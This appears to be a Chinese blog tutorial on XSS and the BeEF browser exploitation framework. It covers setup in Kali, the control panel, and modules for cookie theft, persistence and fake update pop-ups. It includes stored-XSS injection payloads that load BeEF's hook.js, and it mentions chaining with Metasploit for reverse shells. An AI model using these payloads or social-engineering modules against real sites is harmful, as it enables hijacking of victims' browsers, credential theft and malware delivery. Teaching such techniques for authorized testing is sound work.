浅谈一下xss工具----beef

		今天主要聊一下,从认识xss的危害到beef-xss的利用	
		beef是一个类似与sql注入的sqlmap一样,也是一种工具。

一、xss简介

	定义:	跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞,
			它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中
	种类:
			反射型xss:
					提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,是非持久型攻击
			存储型xss:
					你提交的数据成功实现了xss,存入了数据库,别人访问这个页面的时候就会自动触发
			Dom型xss:
					经过一种编码的xss,详情:	https://t.cn/A6Apaxi8

二、认识xss的危害

	危害:
			盗取cookie(主要)
			获取内网ip
			获取浏览器保存的明文密码
			截取网页屏幕
			网页上记录键盘	
			。。。
			等等很多,这仅仅是常见的	

三、beef-xss简介

	定义:
			一款浏览器攻击框架,利用Ruby语言开发的,
			kali中默认安装的一个模块
			用于实现对xss漏洞的攻击和利用
			
			简单说,
					Beef-xss是对xss漏洞的最大化利用,
					直接获取对方系统信息以及作为社会工程学工具进行利用
			
			题外话,
					其实beef最经典的还是他的打开图像(一个牛)

四、beef-xss使用

启动步骤:												(kali环境中)
		第一:进入beef文件夹						cd /usr/share/beef-xss/					 
		
						补充:可以看看该文件夹都有什么文件
							beef		---		主程序
							xxx.pem     ---		证书
							.yaml		---		配置文件
							db			---		数据库
							modules		---		模块
							extensions	---		利用工具
				
		第二:启动beef										./beef									
		
						补充:第一次使用会提示修改默认密码(beef)
						如何修改?
								cd /usr/share/beef-xss/
								leafpad config.yaml			//leafpad是一款编辑器
								
								此时应该以文本方式打开了该配置文件
								找到,		
											user:	"beef"
											passwd:	"beef"
								随意修改为自己想改的,保存,关闭
					
		第三:重启beef										./beef
				
						最下边会有一些网址,如:
						Hook URL:				http://127.0.0.1:3000/hook.js
						 UI URL:				http://127.0.0.1:3000/ui/panel
						
						第一个是钩子----类似xss平台的一些连接
						//不懂xss平台的可以去百度一下,很多实战教程估计
						
						第二个是beef的网页登录连接,直接复制,浏览器打开即可
						//简单说,就是beef的后台
						
			
网页功能的一些介绍
		左上角的Hooked Browsers是受害者主机;
		下边两个选项,即上线的,没上线的
		
		中间的Getting Started是一些说明,即说明手册
		
		Logs是日志	Zombies是监控
		
		
注意的一点,我们在打存储型xss的时候,如留言框处,不要留言http://127.0----/hook.js
		而是这种:	
				<sCRiPt sRC=//127.0.0.1:3000/hook.js></sCrIpT>
				</tExtArEa>'"><sCRiPt sRC=http://127.0.0.1:3000/hook.js></sCrIpT>
					
				是不是很类似xss平台的一些平台?   其实本质原理都是一样的		
				
				问:	为什么要在钩子前加上<script>等等标签?
				答:因为要执行js语句,不然怎么去加载执行你的恶意脚本
				

beef-控制台介绍:
		~点击受害者主机,选择Commands选项(中间偏上的位置)
		~看到一些灯(红的、白的、绿的、橙的)
		
				//其实是每个命令模块都有一个交通灯图标,用于指示以下内容
				
				绿色:命令模块对目标起作用,对用户应该是不可见的
				橙色:命令模块对目标起作用,但可能对用户可见
				白是:尚未针对此目标验证命令模块
				红色:命令模块不适用于此目标

		常用模块:
				~浏览器(browser)
				~持续控制(Persistentce)
				~社会工程学(Social Engineering)
		
		多提一下这个社工模块,
				可以让浏览器弹窗显示  “XXX”  可以更新了,
				管理员一点击更新,就会下载一些咱们 让他下载的东西
				
				这种模仿,几乎可以以假乱真。所以,也多提一下
				工具的使用,一定要在有授权的情况下,大家心里有个数
		
		
		根据这些功能可以产生非常大的危害,因为本质上xss的危害就是操纵浏览器,浏览器可以一定程度上操纵计算机。
		而beef就是一个集成了xss危害的工具。除了上边提到的一些偷cookie之外还可以干的很多
		比如,让受害者主机播放你想让他播放的音乐、获取网页源码、持续控制、社会工程学等等
		
		在多说一下,这个beef可以搭配msf使用,产生更大的危害,如反弹shell
原创文章 61 获赞 13 访问量 1万+

猜你喜欢

转载自blog.csdn.net/weixin_43970718/article/details/105978405
今日推荐